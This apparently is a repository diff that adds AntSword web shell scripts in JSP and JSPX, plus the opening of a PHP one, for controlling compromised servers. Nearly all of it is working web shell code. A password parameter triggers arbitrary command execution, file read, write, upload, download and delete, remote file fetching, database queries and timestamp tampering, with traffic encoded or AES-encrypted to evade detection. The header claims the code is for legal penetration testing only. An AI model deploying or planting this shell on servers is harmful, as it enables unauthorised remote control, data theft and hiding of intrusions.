conn = (EC(conn));
String[] x = conn.trim().replace("\r\n", "\n").split("\n");
Class.forName(x[0].trim());
String url = x[1];
Connection c = DriverManager.getConnection(url,x[2],x[3]);
Statement stmt = c.createStatement();
ResultSet rs = stmt.executeQuery(sql);
ResultSetMetaData rsmd = rs.getMetaData();
if (needcoluname) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
String WwwRootPathCode(String d) throws Exception {
String s = "";
if (!d.substring(0, 1).equals("/")) {
File[] roots = File.listRoots();
for (int i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
}
} else {
s += "/";
}
return s;
}
String FileTreeCode(String dirPath) throws Exception {
File oF = new File(dirPath), l[] = oF.listFiles();
String s = "", sT, sQ, sF = "";
java.util.Date dt;
String fileCode=(String)System.getProperties().get("file.encoding");
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
String nm = new String(l[i].getName().getBytes(fileCode), cs);
if (l[i].isDirectory()) {
s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
} else {
sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
}
}
s += sF;
return new String(s.getBytes(fileCode), cs);
}
String ReadFileCode(String filePath) throws Exception {
String l = "", s = "";
BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs));
while ((l = br.readLine()) != null) {
s += l + "\r\n";
}
br.close();
return s;
}
String WriteFileCode(String filePath, String fileContext) throws Exception {
String h = "0123456789ABCDEF";
String fileHexContext = strtohexstr(fileContext);
File f = new File(filePath);
FileOutputStream os = new FileOutputStream(f);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
File f = new File(fileOrDirPath);
if (f.isDirectory()) {
File x[] = f.listFiles();
for (int k = 0; k < x.length; k++) {
if (!x[k].delete()) {
DeleteFileOrDirCode(x[k].getPath());
}
}
}
f.delete();
return "1";
}
void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
os.write(("->"+"|").getBytes(), 0, 3);
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(("|"+"<-").getBytes(), 0, 3);
os.close();
is.close();
}
String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
String h = "0123456789ABCDEF";
File f = new File(savefilePath);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f,true);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
File sf = new File(sourceFilePath), df = new File(targetFilePath);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
File z[] = sf.listFiles();
for (int j = 0; j < z.length; j++) {
CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
}
} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[1024];
while ((n = is.read(b, 0, 1024)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
return "1";
}
String RenameFileOrDirCode(String oldName, String newName) throws Exception {
File sf = new File(oldName), df = new File(newName);
sf.renameTo(df);
return "1";
}
String CreateDirCode(String dirPath) throws Exception {
File f = new File(dirPath);
f.mkdir();
return "1";
}
String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
File f = new File(fileOrDirPath);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(aTime);
f.setLastModified(dt.getTime());
return "1";
}
String WgetCode(String urlPath, String saveFilePath) throws Exception {
URL u = new URL(urlPath);
int n = 0;
FileOutputStream os = new FileOutputStream(saveFilePath);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while ((n = is.read(b)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
return "1";
}
String SysInfoCode(HttpServletRequest r) throws Exception {
String d = "";
try {
if(r.getSession().getServletContext().getRealPath("/") != null){
d = r.getSession().getServletContext().getRealPath("/");
}else{
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
} catch (Exception e) {
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1);
String serverInfo = (String)System.getProperty("os.name");
String separator = File.separator;
String user = (String)System.getProperty("user.name");
String driverlist = WwwRootPathCode(d);
return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
}
boolean isWin() {
String osname = (String)System.getProperty("os.name");
osname = osname.toLowerCase();
if (osname.startsWith("win"))
return true;
return false;
}
String ExecuteCommandCode(String cmdPath, String command) throws Exception {
StringBuffer sb = new StringBuffer("");
String[] c = { cmdPath, !isWin() ? "-c" : "/c", command };
Process p = Runtime.getRuntime().exec(c);
CopyInputStream(p.getInputStream(), sb);
CopyInputStream(p.getErrorStream(), sb);
return sb.toString();
}
String getEncoding(String str) {
String encode[] = new String[]{
"UTF-8",
"ISO-8859-1",
"GB2312",
"GBK",
"GB18030",
"Big5",
"Unicode",
"ASCII"
};
for (int i = 0; i < encode.length; i++){
try {
if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) {
return encode[i];
}
} catch (Exception ex) {
}
}
return "";
}
String strtohexstr(String fileContext)throws Exception{
String h = "0123456789ABCDEF";
byte[] bytes = fileContext.getBytes(cs);
StringBuilder sb = new StringBuilder(bytes.length * 2);
for (int i = 0; i < bytes.length; i++) {
sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
}
String fileHexContext = sb.toString();
return fileHexContext;
}
String asenc(String str, String decode) throws Exception{
if(decode.equals("hex") || decode=="hex"){
return strtohexstr(str);
}else if(decode.equals("base64") || decode == "base64"){
String sb = "";
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
sb = encoder.encode(str.getBytes());
return sb;
}else if(decode.equals("hex_base64") || decode == "hex_base64"){
return asenc(asenc(str, "base64"), "hex");
}else if(decode.equals("aes_base64") || decode == "aes_base64"){
String sb1 = "";
sb1 = AesEncrypt(AesKey, asenc(str, "base64"));
return sb1.replace("\r\n","");
}
return str;
}
String decode(String str) {
byte[] bt = null;
try {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
} catch (IOException e) {
e.printStackTrace();
}
return new String(bt);
}
String decode(String str, String encode) throws Exception{
if(encode.equals("hex") || encode=="hex"){
if(str=="null"||str.equals("null")){
return "";
}
String hexString = "0123456789ABCDEF";
str = str.toUpperCase();
ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2);
String ss = "";
for (int i = 0; i < str.length(); i += 2){
ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
}
return baos.toString(cs);
}else if(encode.equals("base64") || encode == "base64"){
byte[] bt = null;
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
return new String(bt,cs);
}else if(encode.equals("aes") || encode == "aes") {
String str1 = AesDecrypt(AesKey, str);
return str1.trim();
}
return str;
}
String AesEncrypt(String key, String cleartext) throws Exception {
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv);
byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8"));
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
String sb = encoder.encode(encryptedData);
return sb;
}
String AesDecrypt(String key ,String encrypted) throws Exception {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
byte[] byteMi = decoder.decodeBuffer(encrypted);
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv);
byte[] decryptedData = cipher.doFinal(byteMi);
return new String(decryptedData, "UTF-8");
}
String getKeyFromCookie(Cookie[] cookies){
String key = "";
StringBuilder result = new StringBuilder();
if( cookies != null ){
for (Cookie c : cookies) {
if (c.getName().equals(SessionKey)) {
key = c.getValue();
break;
}
}
}
if(key.length() < aes_keylen){
for(int i=0;key.length() < aes_keylen;i++){
key += aes_key_padding;
}
}if(key.length() > aes_keylen){
key = key.substring(0,aes_keylen);
}
return key;
}
void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
br.close();
}%>
<%
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
Cookie cookie = new Cookie(SessionKey, session.getId());
response.addCookie(cookie);
try {
AesKey = getKeyFromCookie(request.getCookies());
String funccode = EC(request.getParameter(Pwd) + "");
String z0 = EC(decode(request.getParameter("z0")+"", encoder));
String z1 = EC(decode(request.getParameter("z1")+"", encoder));
String z2 = EC(decode(request.getParameter("z2")+"", encoder));
String z3 = EC(decode(request.getParameter("z3")+"", encoder));
String[] pars = { z0, z1, z2, z3};
output.append(decode(RetS,"base64"));
if (funccode.equals("B")) {
sb.append(FileTreeCode(pars[1]));
} else if (funccode.equals("C")) {
sb.append(ReadFileCode(pars[1]));
} else if (funccode.equals("D")) {
sb.append(WriteFileCode(pars[1], pars[2]));
} else if (funccode.equals("E")) {
sb.append(DeleteFileOrDirCode(pars[1]));
} else if (funccode.equals("F")) {
DownloadFileCode(pars[1], response);
} else if (funccode.equals("U")) {
sb.append(UploadFileCode(pars[1], pars[2]));
} else if (funccode.equals("H")) {
sb.append(CopyFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("I")) {
sb.append(RenameFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("J")) {
sb.append(CreateDirCode(pars[1]));
} else if (funccode.equals("K")) {
sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2]));
} else if (funccode.equals("L")) {
sb.append(WgetCode(pars[1], pars[2]));
} else if (funccode.equals("M")) {
sb.append(ExecuteCommandCode(pars[1], pars[2]));
} else if (funccode.equals("N")) {
sb.append(showDatabases(pars[0], pars[1]));
} else if (funccode.equals("O")) {
sb.append(showTables(pars[0], pars[1], pars[2]));
} else if (funccode.equals("P")) {
sb.append(showColumns(pars[0], pars[1], pars[2], pars[3]));
} else if (funccode.equals("Q")) {
sb.append(query(pars[0], pars[1], pars[2]));
} else if (funccode.equals("A")) {
sb.append(SysInfoCode(request));
}else{
sb.append(Version);
}
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
try {
output.append(asenc(sb.toString(), decoder));
}catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
output.append(decode(RetE, "base64"));
out.print(output.toString());
%>

570
antSword-shells/jspx_custom_script_for_mysql.jspx Normal file
View File

@@ -0,0 +1,570 @@
<!--
_ ____ _
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
———————————————————————————————————————————————
AntSword JSPX Custom Script for Mysql
警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
———————————————————————————————————————————————
说明:
1. AntSword >= v2.1.0
2. 创建 Shell 时选择 custom 模式连接
3. 数据库连接:
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
注意:以上是两行
4. 本脚本中 encoder/decoder 与 AntSword 添加 Shell 时选择的 encoder/decoder 要一致,如果选择 default 则需要将值设置为空
ChangeLog:
v1.8
1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
v1.7
1. 新增 AES 编码/解码 支持 (thx @Ch1ngg)
2. 新增 Version, 直接访问不带任何参数会返回当前 shell 的版本号
v1.6
1. 新增 4 种解码器支持
v1.5
1. 修正 base64 编码器下连接数据库 characterEncoding 出错
v1.4
1. 修正 windows 下基础路径获取盘符会出现小写的情况
v1.3
1. 修正上传文件超过1M时的bug
2. 修正weblogic war 包布署获取路径问题
3. 修正文件中文字符问题
Date: 2016/04/29 v1.2
1. 修正修改包含结束tag的文件会出错的 bug
Date: 2016/04/06 v1.1
1. 修正下载文件参数设置错误
2. 修正一些注释的细节
Date: 2016/03/26 v1
1. 文件系统 和 terminal 管理
2. mysql 数据库支持
3. 支持 base64 和 hex 编码
-->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
<jsp:directive.page import="java.io.*"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.net.*"/>
<jsp:directive.page import="java.sql.*"/>
<jsp:directive.page import="java.text.*"/>
<jsp:directive.page import="javax.crypto.*"/>
<jsp:directive.page import="java.security.*"/>
<jsp:directive.page import="javax.crypto.spec.*"/>
<jsp:declaration>
<![CDATA[
// ################################################
String Pwd = "ant"; //连接密码
// 编码器 3 选 1
String encoder = ""; // default
// String encoder = "base64"; //base64
// String encoder = "hex"; //hex(推荐)
// String encoder = "aes"; // aes(加密方式见下文aes配置)
String cs = "UTF-8"; // 字符编码
// 解码器 4 选 1
String decoder = "";
// String decoder = "base64"; // base64 中文正常
// String decoder = "hex"; // hex 中文可能有问题
// String decoder = "hex_base64"; // hex(base64) // 中文正常
// String decoder = "aes_base64"; // aes(base64) (加密方式见下文aes配置)
// 其它配置
String SessionKey = "CUSTOMSESSID"; // 自定义sessionkey id
String RetS = "LT58"; // 数据起始分割符 base64
String RetE = "fDwt"; // 数据结束分割符 base64
// aes 加密配置项
/*
* aes-128-cfb_zero_padding:
* - aes_mode: CFB
* - aes_padding: NoPadding
* - aes_keylen: 16
* aes-256-ecb_zero_padding:
* - aes_mode: ECB
* - aes_padding: NoPadding
* - aes_keylen: 32
*/
// 注意: 以下4项为 encoder/decoder 共用
// 如果需要请求和返回采用不同方式, 自行修改
String aes_mode = "CFB"; // CBC|ECB|CFB|
String aes_padding = "NoPadding"; // NoPadding|PKCS5Padding|PKCS7Padding
int aes_keylen = 16; // 16|32 // 16(AES-128) 32(AES-256)
String aes_key_padding = "a"; // 获取到的 key 位数不够时填充字符
// ################################################################
String AesKey = "";
String Version = "1.7";
String EC(String s) throws Exception {
if(encoder.equals("hex") || encoder == "hex") return s;
return new String(s.getBytes(), cs);
}
String showDatabases(String encode, String conn) throws Exception {
String sql = "show databases";
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showTables(String encode, String conn, String dbname) throws Exception {
String sql = "show tables from " + dbname;
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showColumns(String encode, String conn, String dbname, String table) throws Exception {
String columnsep = "\t";
String rowsep = "";
String sql = "select * from " + dbname + "." + table + " limit 0,0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String query(String encode, String conn, String sql) throws Exception {
String columnsep = "\t|\t";
String rowsep = "\r\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
throws Exception {
String ret = "";
conn = (EC(conn));
String[] x = conn.trim().replace("\r\n", "\n").split("\n");
Class.forName(x[0].trim());
String url = x[1] + "&characterEncoding=" + decode(EC(encode),encoder);
Connection c = DriverManager.getConnection(url);
Statement stmt = c.createStatement();
ResultSet rs = stmt.executeQuery(sql);
ResultSetMetaData rsmd = rs.getMetaData();
if (needcoluname) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
String WwwRootPathCode(String d) throws Exception {
String s = "";
if (!d.substring(0, 1).equals("/")) {
File[] roots = File.listRoots();
for (int i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
}
} else {
s += "/";
}
return s;
}
String FileTreeCode(String dirPath) throws Exception {
File oF = new File(dirPath), l[] = oF.listFiles();
String s = "", sT, sQ, sF = "";
java.util.Date dt;
String fileCode=(String)System.getProperties().get("file.encoding");
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
String nm = new String(l[i].getName().getBytes(fileCode), cs);
if (l[i].isDirectory()) {
s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
} else {
sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
}
}
s += sF;
return new String(s.getBytes(fileCode), cs);
}
String ReadFileCode(String filePath) throws Exception {
String l = "", s = "";
BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs));
while ((l = br.readLine()) != null) {
s += l + "\r\n";
}
br.close();
return s;
}
String WriteFileCode(String filePath, String fileContext) throws Exception {
String h = "0123456789ABCDEF";
String fileHexContext = strtohexstr(fileContext);
File f = new File(filePath);
FileOutputStream os = new FileOutputStream(f);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
File f = new File(fileOrDirPath);
if (f.isDirectory()) {
File x[] = f.listFiles();
for (int k = 0; k < x.length; k++) {
if (!x[k].delete()) {
DeleteFileOrDirCode(x[k].getPath());
}
}
}
f.delete();
return "1";
}
void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
os.write(("->"+"|").getBytes(), 0, 3);
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(("|"+"<-").getBytes(), 0, 3);
os.close();
is.close();
}
String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
String h = "0123456789ABCDEF";
File f = new File(savefilePath);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f,true);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
File sf = new File(sourceFilePath), df = new File(targetFilePath);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
File z[] = sf.listFiles();
for (int j = 0; j < z.length; j++) {
CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
}
} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[1024];
while ((n = is.read(b, 0, 1024)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
return "1";
}
String RenameFileOrDirCode(String oldName, String newName) throws Exception {
File sf = new File(oldName), df = new File(newName);
sf.renameTo(df);
return "1";
}
String CreateDirCode(String dirPath) throws Exception {
File f = new File(dirPath);
f.mkdir();
return "1";
}
String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
File f = new File(fileOrDirPath);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(aTime);
f.setLastModified(dt.getTime());
return "1";
}
String WgetCode(String urlPath, String saveFilePath) throws Exception {
URL u = new URL(urlPath);
int n = 0;
FileOutputStream os = new FileOutputStream(saveFilePath);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while ((n = is.read(b)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
return "1";
}
String SysInfoCode(HttpServletRequest r) throws Exception {
String d = "";
try {
if(r.getSession().getServletContext().getRealPath("/") != null){
d = r.getSession().getServletContext().getRealPath("/");
}else{
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
} catch (Exception e) {
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1);
String serverInfo = (String)System.getProperty("os.name");
String separator = File.separator;
String user = (String)System.getProperty("user.name");
String driverlist = WwwRootPathCode(d);
return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
}
boolean isWin() {
String osname = (String)System.getProperty("os.name");
osname = osname.toLowerCase();
if (osname.startsWith("win"))
return true;
return false;
}
String ExecuteCommandCode(String cmdPath, String command) throws Exception {
StringBuffer sb = new StringBuffer("");
String[] c = { cmdPath, !isWin() ? "-c" : "/c", command };
Process p = Runtime.getRuntime().exec(c);
CopyInputStream(p.getInputStream(), sb);
CopyInputStream(p.getErrorStream(), sb);
return sb.toString();
}
String getEncoding(String str) {
String encode[] = new String[]{
"UTF-8",
"ISO-8859-1",
"GB2312",
"GBK",
"GB18030",
"Big5",
"Unicode",
"ASCII"
};
for (int i = 0; i < encode.length; i++){
try {
if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) {
return encode[i];
}
} catch (Exception ex) {
}
}
return "";
}
String strtohexstr(String fileContext)throws Exception{
String h = "0123456789ABCDEF";
byte[] bytes = fileContext.getBytes(cs);
StringBuilder sb = new StringBuilder(bytes.length * 2);
for (int i = 0; i < bytes.length; i++) {
sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
}
String fileHexContext = sb.toString();
return fileHexContext;
}
String asenc(String str, String decode){
if(decode.equals("hex") || decode=="hex"){
return strtohexstr(str);
}else if(decode.equals("base64") || decode == "base64"){
String sb = "";
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
sb = encoder.encode(str.getBytes());
return sb;
}else if(decode.equals("hex_base64") || decode == "hex_base64"){
return asenc(asenc(str, "base64"), "hex");
}else if(decode.equals("aes_base64") || decode == "aes_base64"){
String sb1 = "";
sb1 = AesEncrypt(AesKey, asenc(str, "base64"));
return sb1.replace("\r\n","");
}
return str;
}
String decode(String str) {
byte[] bt = null;
try {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
} catch (IOException e) {
e.printStackTrace();
}
return new String(bt);
}
String decode(String str, String encode) throws Exception{
if(encode.equals("hex") || encode=="hex"){
if(str=="null"||str.equals("null")){
return "";
}
String hexString = "0123456789ABCDEF";
str = str.toUpperCase();
ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2);
String ss = "";
for (int i = 0; i < str.length(); i += 2){
ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
}
return baos.toString(cs);
}else if(encode.equals("base64") || encode == "base64"){
byte[] bt = null;
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
return new String(bt,cs);
}else if(encode.equals("aes") || encode == "aes") {
String str1 = AesDecrypt(AesKey, str);
return str1.trim();
}
return str;
}
String AesEncrypt(String key, String cleartext) throws Exception {
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv);
byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8"));
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
String sb = encoder.encode(encryptedData);
return sb;
}
String AesDecrypt(String key ,String encrypted) throws Exception {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
byte[] byteMi = decoder.decodeBuffer(encrypted);
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv);
byte[] decryptedData = cipher.doFinal(byteMi);
return new String(decryptedData, "UTF-8");
}
String getKeyFromCookie(Cookie[] cookies){
String key = "";
StringBuilder result = new StringBuilder();
if( cookies != null ){
for (Cookie c : cookies) {
if (c.getName().equals(SessionKey)) {
key = c.getValue();
break;
}
}
}
if(key.length() < aes_keylen){
for(int i=0;key.length() < aes_keylen;i++){
key += aes_key_padding;
}
}if(key.length() > aes_keylen){
key = key.substring(0,aes_keylen);
}
return key;
}
void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
br.close();
}
]]>
</jsp:declaration>
<jsp:scriptlet>
<![CDATA[
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
Cookie cookie = new Cookie(SessionKey, session.getId());
response.addCookie(cookie);
try {
AesKey = getKeyFromCookie(request.getCookies());
String funccode = EC(request.getParameter(Pwd) + "");
String z0 = EC(decode(request.getParameter("z0")+"", encoder));
String z1 = EC(decode(request.getParameter("z1")+"", encoder));
String z2 = EC(decode(request.getParameter("z2")+"", encoder));
String z3 = EC(decode(request.getParameter("z3")+"", encoder));
String[] pars = { z0, z1, z2, z3};
output.append(decode(RetS,"base64"));
if (funccode.equals("B")) {
sb.append(FileTreeCode(pars[1]));
} else if (funccode.equals("C")) {
sb.append(ReadFileCode(pars[1]));
} else if (funccode.equals("D")) {
sb.append(WriteFileCode(pars[1], pars[2]));
} else if (funccode.equals("E")) {
sb.append(DeleteFileOrDirCode(pars[1]));
} else if (funccode.equals("F")) {
DownloadFileCode(pars[1], response);
} else if (funccode.equals("U")) {
sb.append(UploadFileCode(pars[1], pars[2]));
} else if (funccode.equals("H")) {
sb.append(CopyFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("I")) {
sb.append(RenameFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("J")) {
sb.append(CreateDirCode(pars[1]));
} else if (funccode.equals("K")) {
sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2]));
} else if (funccode.equals("L")) {
sb.append(WgetCode(pars[1], pars[2]));
} else if (funccode.equals("M")) {
sb.append(ExecuteCommandCode(pars[1], pars[2]));
} else if (funccode.equals("N")) {
sb.append(showDatabases(pars[0], pars[1]));
} else if (funccode.equals("O")) {
sb.append(showTables(pars[0], pars[1], pars[2]));
} else if (funccode.equals("P")) {
sb.append(showColumns(pars[0], pars[1], pars[2], pars[3]));
} else if (funccode.equals("Q")) {
sb.append(query(pars[0], pars[1], pars[2]));
} else if (funccode.equals("A")) {
sb.append(SysInfoCode(request));
}else{
sb.append(Version);
}
} catch (Exception e) {
sb.append("ERROR" + "://" + e.toString());
}
try {
output.append(asenc(sb.toString(), decoder));
}catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
output.append(decode(RetE, "base64"));
out.print(output.toString());
]]>
</jsp:scriptlet>
</jsp:root>

461
antSword-shells/php_custom_script_for_mysql_fix.php Normal file
View File

@@ -0,0 +1,461 @@
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP Custom Script for Mysql
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
*
